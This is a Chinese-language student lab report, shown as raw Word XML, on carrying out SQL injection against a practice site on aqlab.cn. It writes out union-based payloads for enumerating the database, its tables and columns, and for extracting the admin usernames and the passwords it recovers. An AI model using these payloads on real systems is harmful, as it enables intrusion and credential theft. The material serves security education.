              <w:jc w:val="both"/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>学习并掌握SQL注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B023D4C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/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>学习SQL注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="199F962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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380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4C110CA6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24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2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>二、实验项目内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E9DAB5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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>对以下网站进行SQL注入：http://pu2lh35s.ia.aqlab.cn/，完成以下信息的获取：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E98079">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/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>数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20191B46">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/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>数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A46199F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/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>每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BC7613">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/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>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B8721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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>最后总结如何对SQL注入攻击进行防范。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="329395D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09" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380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1F67E4F8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24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2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>三、实验设计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287F2FF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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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>SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行交互时会采用SQL。SQL注入是将Web页面的原URL、表单域或数据包输入的参数修改并拼接成SQL语句，然后传递给Web服务器，进而传给数据库服务器以执行数据库命令。例如，如果Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取数据库的信息并提权，发生SQL注入攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A94734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  <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380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25865641">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24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2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验过程或算法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A191C2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>准备工作：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146F36A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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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>进入http://pu2lh35s.ia.aqlab.cn/，点击蓝色交互按钮：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="282930E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4266565" cy="2289175"/>
                  <wp:effectExtent l="0" t="0" r="635" b="1206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6565" cy="228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5FBFA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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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>观察到网页呈现出一些介绍性内容，同时链接变为http://pu2lh35s.ia.aqlab.cn/?id=1：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E81D850">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4372610" cy="2345690"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="127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2610" cy="2345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B9975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jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>据此猜测该网址采用GET方式传递请求，基于此尝试进行单双引号闭合检查：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508CFD2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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4242435" cy="2276475"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="952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243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5D7B1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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4227830" cy="2268220"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="254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830" cy="226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570E2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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>可以看到无论是传入单引号还是双引号，页面均未返回任何内容，说明SQL查询异常，据此可以推断该网站不存在单双引号闭合，可以直接注入SQL代码。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407784D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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>进一步的，可以使用order by语句判断该SQL语句查询的字段数，并通过二分查找法加速该过程。依次尝试访问：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32ADB26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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="auto"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> order by 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61D3805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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="auto"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> order by 1,2,3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4252DB6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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="auto"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> order by 1,2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA10A6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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3946525" cy="2117725"/>
                  <wp:effectExtent l="0" t="0" r="635" b="63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6525" cy="211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67559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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3938270" cy="2113280"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="508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8270" cy="2113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81DDE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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3994150" cy="2143125"/>
                  <wp:effectExtent l="0" t="0" r="13970" b="571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4150" cy="214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C6C77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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>可以看到，当测试字段数大于2时，网页访问异常。说明该SQL语句所查询的表格字段数为2。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767EC35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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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</w:pPr>
          </w:p>
          <w:p w14:paraId="6CE7E079">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>获取数据库名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D30098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leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4502785" cy="2416175"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="698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2785" cy="2416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0383A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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>结合上述信息，使用联合查询union查询该网站的数据库名称，并使用恒假语句0=1筛除第一个select的查询结果：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8ADDF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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> and 0=1 union select 1,database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE355C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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4483100" cy="2406015"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="190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3100" cy="2406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85BCE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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>根据查询结果可知该网站数据库名称为maoshe。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13EE875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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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</w:pPr>
          </w:p>
          <w:p w14:paraId="262C9E19">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>获取数据库中的所有表的名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53773A6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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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>可以通过访问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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> and 0=1 union select 1,table_name from information_schema.tables where table_schema=</w:t>
            </w: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>’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>maoshe</w:t>
            </w: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>’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>来获得数据库中所有表的名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DCB38E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4580890" cy="2458085"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1079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0890" cy="2458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0E0A1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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>根据查询结果可知，该网站的数据库中存在一张名称为admin的表。通常情况下，数据库中存储的表数量都不止1张，因此可以通过添加limit n,m后缀，例如：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1615D92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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> and 0=1 union select 1,table_name from information_schema.tables where table_schema=</w:t>
            </w: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>’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>maoshe</w:t>
            </w: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>’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 xml:space="preserve"> limit 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0320001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jc w:val="center"/>
              <w:textAlignment w:val="auto"/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</w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4531360" cy="2431415"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="698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1360" cy="2431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4D97C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jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>来获取从第n+1张开始的m张表格名称，共计4张，依次为admin，dirs，xss和news。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F2755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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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</w:pPr>
          </w:p>
          <w:p w14:paraId="74F3AF1E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>获取每个表中的字段数量以及字段名：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440A8A8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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>类似的，可以通过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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://pu2lh35s.ia.aqlab.cn/?id=1" </w:instrTex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fldChar w:fldCharType="separate"/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>http://pu2lh35s.ia.aqlab.cn/?id=1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fldChar w:fldCharType="end"/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 xml:space="preserve"> and 0=1 union select 1, column_name from information_schema.columns where table_name=</w:t>
            </w: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>’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>admin</w:t>
            </w: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>’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>来获得admin表中所有字段的名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E1C67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jc w:val="center"/>
              <w:textAlignment w:val="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4458970" cy="2392680"/>
                  <wp:effectExtent l="0" t="0" r="635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8970" cy="2392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0C2AE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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>根据查询结果可知，该admin表的第一个字段为id。仍然通过limit方法遍历admin表字段，并通过修改table_name=</w:t>
            </w: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>’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>admin</w:t>
            </w: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>’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>为其他表名称，易得每个表中的字段数量以及字段名依次为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5238D87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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>admin：id,username,password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB428E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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>dirs：paths</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3172E07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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>news：id,content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41005FF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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>xss：id,user,pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="378696F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jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default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</w:pPr>
          </w:p>
          <w:p w14:paraId="46C8638F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>获取管理员用户密码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B2A0C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leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/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>同样的，可以通过http://pu2lh35s.ia.aqlab.cn/?id=1 and 0=1 union select 1,group_concat(username) from admin来获得admin表中username列的所有项：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C026884">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4282440" cy="2298065"/>
                  <wp:effectExtent l="0" t="0" r="0" b="317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2440" cy="2298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BB3BF7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default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  <w:t>可以看到管理账户名称依次为：admin，ppt领取微信。进一步的，通过将username替换为password可知，上述两个账户的密码分别为hellohack和zkaqbanban：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7171D424">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4598670" cy="2467610"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="127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8670" cy="2467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26EF73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95" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380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098D2D31">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24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2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>五、实验过程中遇到的问题及解决情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A6EE916">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2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/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>问题1：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1418E86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11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firstLine="420" w:firstLineChars="200"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>部分情况下，limit n,m语句返回的表项只显示第1项，无法一次性得到所有的表项信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB69BA9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
